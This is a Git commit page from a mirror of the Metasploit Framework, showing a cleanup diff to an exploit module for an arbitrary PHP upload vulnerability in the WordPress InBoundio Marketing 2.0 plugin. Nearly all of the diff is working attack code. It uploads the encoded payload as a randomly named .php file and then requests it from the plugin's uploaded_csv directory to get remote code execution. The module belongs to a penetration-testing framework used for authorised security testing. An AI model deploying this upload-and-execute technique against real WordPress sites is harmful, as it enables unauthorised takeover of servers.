infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do code cleanup

bug/bundler_fix
jvazquez-r7 2015-04-24 10:47:46 -05:00
parent b5223912cb
commit 8a8d9a26f4
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 13 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
View File

@ -13,10 +13,12 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress InBoundio Marketing Upload Vulnerability',
'Name' => 'Wordpress InBoundio Marketing PHP Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress InBoundio Marketing
version 2.0. The vulnerability allows for arbitrary file upload and remote code execution.
This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version
2.0. It allows to upload arbitrary php files and get remote code execution. This module
has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on
Ubuntu 14.04 Server.
},
'Author' =>
[
@ -44,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
php_page_name = rand_text_alpha(8 + rand(8)) + '.php'
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_pagename}\"")
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"")
post_data = data.to_s
res = send_request_cgi(
@ -58,19 +60,20 @@ class Metasploit3 < Msf::Exploit::Remote
)
if res
if res.code == 200 && res.body =~ /#{php_pagename}/
print_good("#{peer} - Our payload is at: #{php_pagename}.")
register_files_for_cleanup(php_pagename)
if res.code == 200 && res.body.include?(php_page_name)
print_good("#{peer} - Our payload is at: #{php_page_name}.")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
fail_with(Failure::Unknown, 'Server did not answer')
end
print_status("#{peer} - Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_pagename)
{ 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) },
5
)
end
end